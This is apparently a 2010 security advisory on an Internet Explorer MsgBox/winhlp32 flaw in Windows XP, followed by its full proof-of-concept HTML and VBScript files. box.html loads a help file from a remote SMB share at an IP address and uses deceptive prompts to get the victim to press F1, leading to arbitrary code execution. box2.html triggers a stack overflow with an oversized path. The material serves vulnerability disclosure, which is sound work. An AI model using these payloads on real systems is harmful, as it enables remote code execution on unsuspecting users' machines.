|
------------------isec-0027-msgbox-helpfile-ie.txt------------
===[ ABSTRACT ]=========================================================
It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6
using VBScript. Passing malicious .HLP file to winhlp32 could allow
remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe.
===[ AFFECTED SOFTWARE ]================================================
Windows XP SP3
NOT AFFECTED: Vista, Windows 7
===[ DESCRIPTION ]======================================================
To trigger vulnerability some user interaction is needed. Victim has to
press F1 when MsgBox popup is displayed.
Syntax of MsgBox function:
MsgBox(prompt[,buttons][,title][,helpfile,context])
It is possible to pass remote samba share as helpfile parameter.
In addition there is a stack based buffer overflow when helpfile
parameter is too long. However, on XP winhlp32.exe is compiled with
/GS flag, which in this case effectively guard the stack.
Proof-of-Concept is available here:
http://isec.pl/poc-isec27/
===[ IMPACT ]===========================================================
Score: MEDIUM
The vulnerability allows remote attacker to run arbitrary code on
victim machine.
===[ DISCLOSURE TIMELINE ]==============================================
01 Feb 2007 The vulnerability was discovered.
26 Feb 2010 Public disclosure
===[ AUTHOR ]===========================================================
Maurycy Prodeus | twitter.com/mprodeus
-------------------------------------------poc-isec27.html-----------------------------------
<html>
<title>IE8, IE7 XP MsgBox PoC</title>
<body>
<script>
if(navigator.userAgent.indexOf('MSIE') < 0)
document.write('<b>Warn: Your browser isn\'t IE ? It won\'t work.</b>');
</script>
<br><br>
This is simple demo for IE8/IE7 (only WinXP) vulnerability described here:<br>
<a href="http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt">http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt</a>
<br><br><br>
[+] The first one should spawn calc.exe after pressing F1.
<br>
<FORM>
<INPUT TYPE="BUTTON" VALUE="Calc.exe" ONCLICK="window.location.href='box.html'">
</FORM>
<br><br>
[+] The second one triggers stack overflow in winhlp32 process.
<br>
<FORM>
<INPUT TYPE="BUTTON" VALUE="Stack Overflow" ONCLICK="window.location.href='box2.html'">
</FORM>
<br><br>
iSEC 2010 (C) <a href="http://twitter.com/mprodeus">maurycy prodeus</a>
</body>
</html>
-----------------------------------box2.html----------------------------
<html>
<script type="text/vbscript">
big = "aaaa"
For i=1 to 4500
big = big & "\..\"
Next
MsgBox "please press F1 to save the world", ,"please save the world", big, 1
</script>
</html>
------------------------box.html-----------------------------------
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
//For i=1 to 2500
// big = big & "\..\"
//Next
MsgBox "please press F1 to save the world", ,"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>
|
推荐
评论(0条)
